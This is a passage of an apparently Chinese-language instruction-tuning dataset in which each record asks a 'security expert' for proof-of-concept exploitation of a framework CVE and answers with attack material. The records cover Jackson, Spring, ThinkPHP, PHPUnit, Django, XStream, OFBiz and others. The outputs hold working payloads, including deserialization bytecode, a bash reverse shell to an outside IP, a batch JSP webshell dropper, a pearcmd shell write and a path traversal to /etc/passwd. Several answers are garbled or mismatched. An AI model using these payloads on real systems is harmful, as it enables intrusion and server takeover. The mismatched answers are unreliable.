Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/json\nContent-Length: 1298\n\n{\n  \"param\": [\n    \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\n    {\n      \"transletBytecodes\": [\n  \"yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw==\"\n      ],\n      \"transletName\": \"a.b\",\n      \"outputProperties\": {}\n    }\n  ]\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Jackson-databind 反序列化漏洞 CVE-2017-7525+CVE-2017-17485.md"}
    1106. 

  1106. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Cloud Function SPEL 远程命令执行漏洞\n漏洞描述:Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。\n影响版本:``` Spring Cloud Function ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. Spring Cloud Function\n2. POST /functionRouter HTTP/1.1\nHost: 192.168.1.27:9000\nspring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"ping -c 1 dxytoy.dnslog.cn\")\nContent-Length: 1\n3. POST /functionRouter HTTP/1.1\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Cloud Function SPEL 远程命令执行漏洞.md"}
    1107. 

  1107. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:FastAdmin 远程代码执行漏洞\n漏洞描述:FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。FastAdmin框架存在有条件RCE漏洞,当攻击者具有一定用户权限的前提下,可以实现任意文件上传,导致RCE。 参考链接: - https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg - https://nosec.org/home/detail/4713.html\n网络测绘:``` app=\"FASTADMIN-框架\" || body=\"\\\"uploadurl\\\":\\\"ajax\\/upload\\\"\" || body=\"api.fastadmin.net\" || body=\"\\\"fastadmin\\\":{\\\"usercenter\\\":true\" || body=\"content=\\\"FastAdmin\\\"\" || body=\"cdnurl\\\":\\\"\\\",\\\"version\"|| icon_hash=\"-1036943727\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. app=\"FASTADMIN-框架\" || body=\"\\\"uploadurl\\\":\\\"ajax\\/upload\\\"\" || body=\"api.fastadmin.net\" || body=\"\\\"fastadmin\\\":{\\\"usercenter\\\":true\" || body=\"content=\\\"FastAdmin\\\"\" || body=\"cdnurl\\\":\\\"\\\",\\\"version\"|| icon_hash=\"-1036943727\"\n2. //传入xx.php\nPOST /index/ajax/upload HTTP/1.1\nHost: target\n\n------WebKitFormBoundarybw5c2a2bqlLLOMEU\nContent-Disposition: form-data; name=\"file\"; filename=\"Xnip2021-04-02_11-05-27.png\"\nContent-Type: application/octet-stream\n\nPNG\n...\n<?php phpinfo();?>\n------WebKitFormBoundarybw5c2a2bqlLLOMEU\nContent-Disposition: form-data; name=\"chunkid\"\n\nxx.php\n\n------WebKitFormBoundarybw5c2a2bqlLLOMEU\nContent-Disposition: form-data; name=\"chunkindex\"\n\n0\n------WebKitFormBoundarybw5c2a2bqlLLOMEU\n3. - https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/FastAdmin 远程代码执行漏洞.md"}
    1108. 

  1108. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jackson-databind SSRF&RCE CVE-2020-36179~36182\n漏洞描述:漏洞类型:JDNI注入导致RCE 利用条件: - 开启enableDefaultTyping() - 使用了org.apache.servicemix.bundles第三方依赖库 以下类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成SSRF&RCE: - CVE-2020-36179:org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS - CVE-2020-36180:  org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS - CVE-2020-36181:  org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS - CVE-2020-36182:  org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS 参考链接: - https://github.com/Al1ex/CVE-2020-36179\n影响版本:``` Jackson-databind < 2.9.10.7 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-36179\n【POC利用方法】\n1. Jackson-databind < 2.9.10.7\n2. <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\"\n         xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n         xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\">\n    <modelVersion>4.0.0</modelVersion>\n\n    <groupId>com.jacksonTest</groupId>\n    <artifactId>jacksonTest</artifactId>\n    <version>1.0-SNAPSHOT</version>\n    <dependencies>\n        <dependency>\n            <groupId>com.fasterxml.jackson.core</groupId>\n            <artifactId>jackson-databind</artifactId>\n            <version>2.9.10.7</version>\n        </dependency>\n        <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-dbcp2 -->\n        <dependency>\n            <groupId>org.apache.commons</groupId>\n            <artifactId>commons-dbcp2</artifactId>\n            <version>2.8.0</version>\n        </dependency>\n        <!-- https://mvnrepository.com/artifact/com.h2database/h2 -->\n        <dependency>\n            <groupId>com.h2database</groupId>\n            <artifactId>h2</artifactId>\n            <version>1.4.199</version>\n        </dependency>\n\n        <dependency>\n            <groupId>org.slf4j</groupId>\n            <artifactId>slf4j-nop</artifactId>\n            <version>1.7.2</version>\n        </dependency>\n        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->\n        <dependency>\n            <groupId>javax.transaction</groupId>\n            <artifactId>jta</artifactId>\n            <version>1.1</version>\n        </dependency>\n    </dependencies>\n</project>\n3. CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {\n        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\");\n        return s.hasNext() ? s.next() : \"\";  }\n$$;\nCALL SHELLEXEC('calc.exe')\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Jackson-databind SSRF&RCE CVE-2020-36179~36182.md"}
    1109. 

  1109. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841\n漏洞描述:PHPUnit5.6.3之前的版本,存在一处远程代码执行漏洞,利用漏洞可以获取服务器敏感信息及权限。\n影响版本:``` PHPUnit < 5.6.3 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2017-9841\n【POC利用方法】\n1. PHPUnit < 5.6.3\n2. eval('?>'.file_get_contents('php://input'));\n3. POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: \nContent-Length: 21\nAccept-Encoding: gzip\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841.md"}
    1110. 

  1110. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ThinkPHP 多语言本地文件包含漏洞\n漏洞描述:ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用`lang`参数来包含任意PHP文件。 虽然只能包含本地PHP文件,但在开启了`register_argc_argv`且安装了pcel/pear的环境下,可以包含`/usr/local/lib/php/pearcmd.php`并写入任意文件。 参考链接: - <https://tttang.com/archive/1865/> - <https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp> (本文介绍了`pearcmd.php`利用技巧的原理)\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36\nConnection: close\nCache-Control: max-age=0\n3. - <https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp> (本文介绍了`pearcmd.php`利用技巧的原理)\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/ThinkPHP 多语言本地文件包含漏洞.md"}
    1111. 

  1111. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jackson-databind 远程代码执行 CVE-2019-12384\n漏洞描述:多个Redhat产品受此漏洞影响,CVSS评分为8.1,漏洞利用复杂度高。 该漏洞是由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。\n影响版本:受影响版本: ``` Jackson-databind 2.X < 2.9.9.1 ``` 不受影响版本: ``` Jackson-databind 2.9.9.1 Jackson-databind 2.10 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2019-12384\n【POC利用方法】\n1. Jackson-databind 2.X < 2.9.9.1\n2. Jackson-databind 2.9.9.1\nJackson-databind 2.10\n3. POST /fuckme HTTP/1.1\nHost: 192.168.136.131:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 109\n\npoc=[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://192.168.136.129:7777/\"}]\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Jackson-databind远程代码执行 CVE-2019-12384.md"}
    1112. 

  1112. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:XStream SSRF 反序列化漏洞 CVE-2020-26258\n漏洞描述:Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。 参考链接: - https://raw.githubusercontent.com/jas502n/CVE-2020-26259/main/CVE_2020_26258.java\n影响版本:影响版本: ``` Xstream < = 1.4.14 ``` 修复版本: ``` Xstream < = 1.4.15 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-26258\n【POC利用方法】\n1. Xstream < = 1.4.14\n2. Xstream < = 1.4.15\n3. import com.thoughtworks.xstream.XStream;\n\n/*\nCVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling\nwith XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.\nAll versions until and including version 1.4.14\nhttps://x-stream.github.io/CVE-2020-26258.html\nSecurity framework of XStream not explicitly initialized, using predefined black list on your own risk.\n*/\n\npublic class CVE_2020_26258 {\n    public static void main(String[] args) {\n        String ssrf_xml = \"<map>\\n\" +\n                \"  <entry>\\n\" +\n                \"    <jdk.nashorn.internal.objects.NativeString>\\n\" +\n                \"      <flags>0</flags>\\n\" +\n                \"      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\\n\" +\n                \"        <dataHandler>\\n\" +\n                \"          <dataSource class='javax.activation.URLDataSource'>\\n\" +\n                \"            <url>http://localhost:8989/internal/:</url>\\n\" +\n                \"          </dataSource>\\n\" +\n                \"          <transferFlavors/>\\n\" +\n                \"        </dataHandler>\\n\" +\n                \"        <dataLen>0</dataLen>\\n\" +\n                \"      </value>\\n\" +\n                \"    </jdk.nashorn.internal.objects.NativeString>\\n\" +\n                \"    <string>test</string>\\n\" +\n                \"  </entry>\\n\" +\n                \"</map>\";\n        XStream xstream = new XStream();\n        xstream.fromXML(ssrf_xml);\n    }\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/XStream SSRF 反序列化漏洞 CVE-2020-26258.md"}
    1113. 

  1113. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568\n漏洞描述:*motionEye*是用Python写的motion的Web前端,它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频,其中存在一个信息泄漏漏洞,通过构造特定的URL即可获取服务器敏感信息\n影响版本:``` MotionEye <= v0.42.1 ```\n网络测绘:``` banner=\"motionEye\" app=\"motionEye\" app=\"motionEye-摄像头服务器\" app=\"motionEye/0.39.3\" app=\"motionEye/0.40\" app=\"motionEye01\" app=\"motionEye/0.33\" app=\"motionEye/0.35\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-25568\n【POC利用方法】\n1. MotionEye <= v0.42.1\n2. banner=\"motionEye\"\n\napp=\"motionEye\"\napp=\"motionEye-摄像头服务器\"\napp=\"motionEye/0.39.3\"\napp=\"motionEye/0.40\"\napp=\"motionEye01\"\napp=\"motionEye/0.33\"\napp=\"motionEye/0.35\"\n3. import sys\nimport json\nimport requests\ndef exp(url):\n    if url[-1] == \"/\":\n        url = url + \"config/list\"\n    else:\n        url = url + \"/config/list\"\n    rus = requests.get(url, verify=False)\n    print(\"信息泄露内容:\")\n    print(json.dumps(json.loads(rus.text), sort_keys=True, indent=4))\nif __name__ == '__main__':\n    ip = sys.argv[1]\n    print(\"访问IP:{0}\".format(ip))\n    exp(ip)\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568.md"}
    1114. 

  1114. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring WebFlow 远程代码执行漏洞 CVE-2017-4971\n漏洞描述:Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。 参考链接: - https://threathunter.org/topic/593d562353ab369c55425a90 - https://pivotal.io/security/cve-2017-4971\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2017-4971\n【POC利用方法】\n1. docker-compose up -d\n2. _(new+java.lang.ProcessBuilder(\"bash\",\"-c\",\"bash+-i+>%26+/dev/tcp/192.168.174.128/9999+0>%261\")).start()=vulhub\n3. POST /hotels/booking?execution=e3s2 HTTP/1.1\nHost: your-vps-ip:8080\nContent-Length: 172\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://your-vps-ip:8080\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://your-vps-ip:8080/hotels/booking?execution=e3s2\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nCookie: lang=zh-CN; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; JSESSIONID=E489BFF839A3C8D346F45D1B1A8BF03F\nConnection: close\n\n_eventId_confirm=&_csrf=5509ae82-f763-41a3-b347-44f09e16fd2e&_(new+java.lang.ProcessBuilder(\"bash\",\"-c\",\"bash+-i+>%26+/dev/tcp/192.168.174.128/9999+0>%261\")).start()=vulhub\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring WebFlow 远程代码执行漏洞 CVE-2017-4971.md"}
    1115. 

  1115. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Cloud Config 目录遍历漏洞 CVE-2019-3799\n漏洞描述:由于 spring-cloud-config-server 模块未对传入路径进行安全限制,攻击者可以利用多个 `..%252f` 进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。\n影响版本:``` Spring Cloud Config 2.1.0 to 2.1.1 Spring Cloud Config 2.0.0 to 2.0.3 Spring Cloud Config 1.4.0 to 1.4.5 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2019-3799\n【POC利用方法】\n1. Spring Cloud Config 2.1.0 to 2.1.1\nSpring Cloud Config 2.0.0 to 2.0.3\nSpring Cloud Config 1.4.0 to 1.4.5\n2. GET /foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1\nHost: your-ip:8888\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Cloud Config 目录遍历漏洞 CVE-2019-3799.md"}
    1116. 

  1116. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Django JSONField/HStoreField SQL注入漏洞 CVE-2019-14234\n漏洞描述:Django在2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。 参考链接: - https://www.djangoproject.com/weblog/2019/aug/01/security-releases/ - https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。Django自带的后台应用Django-Admin中就存在这样的写法,我们可以直接借助它来复现漏洞。\n影响版本:``` Django (1.11.x) Version < 1.11.23 Django (2.1.x) Version < 2.1.11 Django (2.2.x) Version < 2.2.4 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2019-14234\n【POC利用方法】\n1. Django (1.11.x) Version < 1.11.23\nDjango (2.1.x) Version < 2.1.11\nDjango (2.2.x) Version < 2.2.4\n2. docker-compose build\ndocker-compose up -d\n3. http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Django JSONField  HStoreField SQL注入漏洞 CVE-2019-14234.md"}
    1117. 

  1117. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Django debug page XSS漏洞 CVE-2017-12794\n漏洞描述:Django发布了新版本1.11.5,修复了500页面中可能存在的一个XSS漏洞,这篇文章说明一下该漏洞的原理和复现。\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2017-12794\n【POC利用方法】\n1. git clone https://github.com/django/django.git\ncd django\ngit diff 1.11.4 1.11.5 django/views/debug.py\n2. The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:\n-------------------------------------\nThe above exception ({{ frame.exc_cause|force_escape }}) was the direct cause of the following exception:\n3. def __exit__(self, exc_type, exc_value, traceback):\n    if exc_type is None:\n        return\n    for dj_exc_type in (\n            DataError,\n            OperationalError,\n            IntegrityError,\n            InternalError,\n            ProgrammingError,\n            NotSupportedError,\n            DatabaseError,\n            InterfaceError,\n            Error,\n    ):\n        db_exc_type = getattr(self.wrapper.Database, dj_exc_type.__name__)\n        if issubclass(exc_type, db_exc_type):\n            dj_exc_value = dj_exc_type(*exc_value.args)\n            dj_exc_value.__cause__ = exc_value\n            if not hasattr(exc_value, '__traceback__'):\n                exc_value.__traceback__ = traceback\n            # Only set the 'errors_occurred' flag for errors that may make\n            # the connection unusable.\n            if dj_exc_type not in (DataError, IntegrityError):\n                self.wrapper.errors_occurred = True\n            six.reraise(dj_exc_type, dj_exc_value, traceback)\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Django debug page XSS漏洞 CVE-2017-12794.md"}
    1118. 

  1118. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Framework 安全绕过漏洞 CVE-2023-20860\n漏洞描述:在带有 mvcRequestMatcher 的 Spring Security 配置中使用无前缀双通配符模式会导致 Spring Security 和 Spring MVC 之间的模式匹配不匹配,并可能导致安全绕过。\n影响版本:``` 6.0.0 - 6.0.6、5.3.0 - 5.3.25(注:5.3 之前的版本不受影响) ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2023-20860\n【POC利用方法】\n1. 6.0.0 - 6.0.6、5.3.0 - 5.3.25(注:5.3 之前的版本不受影响)\n2. #!/usr/bin/env python3\n#coding:utf-8\n\nimport requests\nimport argparse\nfrom urllib.parse import urljoin\n\ndef Exploit(url):\n    headers = {\"suffix\":\"%>//\",\n                \"c1\":\"Runtime\",\n                \"c2\":\"<%\",\n                \"DNT\":\"1\",\n                \"Content-Type\":\"application/x-www-form-urlencoded\"\n\n    }\n    data = \"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\"\n    try:\n\n        go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)\n        shellurl = urljoin(url, 'tomcatwar.jsp')\n        shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)\n        if shellgo.status_code == 200:\n            print(f\"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami\")\n    except Exception as e:\n        print(e)\n        pass\n\ndef main():\n    parser = argparse.ArgumentParser(description='Srping-Core Rce.')\n    parser.add_argument('--file',help='url file',required=False)\n    parser.add_argument('--url',help='target url',required=False)\n    args = parser.parse_args()\n    if args.url:\n        Exploit(args.url)\n    if args.file:\n        with open (args.file) as f:\n            for i in f.readlines():\n                i = i.strip()\n                Exploit(i)\n\nif __name__ == '__main__':\n    main()\n3. go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Framework 安全绕过漏洞 CVE-2023-20860.md"}
    1119. 

  1119. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OfBiz 反序列化命令执行漏洞 CVE-2023-49070\n漏洞描述:Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。 在Apache OFBiz 17.12.03版本及以前存在一处XMLRPC导致的反序列漏洞,官方于后续的版本中对相关接口进行加固修复漏洞,但修复方法存在绕过问题(CVE-2023-49070),攻击者仍然可以利用反序列化漏洞在目标服务器中执行任意命令。 Apache OFBiz官方于18.12.10中彻底删除xmlrpc接口修复该漏洞。 参考链接: - [https://www.openwall.com/lists/oss-security/2023/12/04/2](https://www.openwall.com/lists/oss-security/2023/12/04/2)\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2023-49070\n【POC利用方法】\n1. docker compose up -d\n2. ERROR MESSAGE\norg.apache.ofbiz.webapp.control.RequestHandlerException: Domain 60.204.216.3 not accepted to prevent host header injection. You need to set host-headers-allowed property in security.properties file.\n3. java -jar ysoserial.jar CommonsBeanutils1 \"touch /tmp/awesome_poc\" | base64 | tr -d \"\\n\"\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache OfBiz 反序列化命令执行漏洞 CVE-2023-49070.md"}
    1120. 

  1120. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518\n漏洞描述:Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。 Apache Flink 1.5.1 引入了一个 REST 处理程序,可以通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。 Apache Flink的任意Jar包上传可以导致远程代码执行。 参考: - https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 - https://nvd.nist.gov/vuln/detail/CVE-2020-17518\n影响版本:``` Apache Flink  <= 1.9.1(最新版本) ```\n网络测绘:``` app=\"Apache-Flink\" && country=\"CN\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-17518\n【POC利用方法】\n1. Apache Flink  <= 1.9.1(最新版本)\n2. app=\"Apache-Flink\" && country=\"CN\"\n3. docker-compose up -d\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518.md"}
    1121. 

  1121. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OfBiz 远程代码执行 RCE\n漏洞描述:Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。 参考链接: - https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz\n网络测绘:``` app=\"Apache_OFBiz\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. app=\"Apache_OFBiz\"\n2. https://localhost/ordermgr/control/FindRequest?foo=bar\"ajaxEnabled=false/>${\"freemarker.template.utility.Execute\"?new()(\"id\")}<FOO\n3. - https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md"}
    1122. 

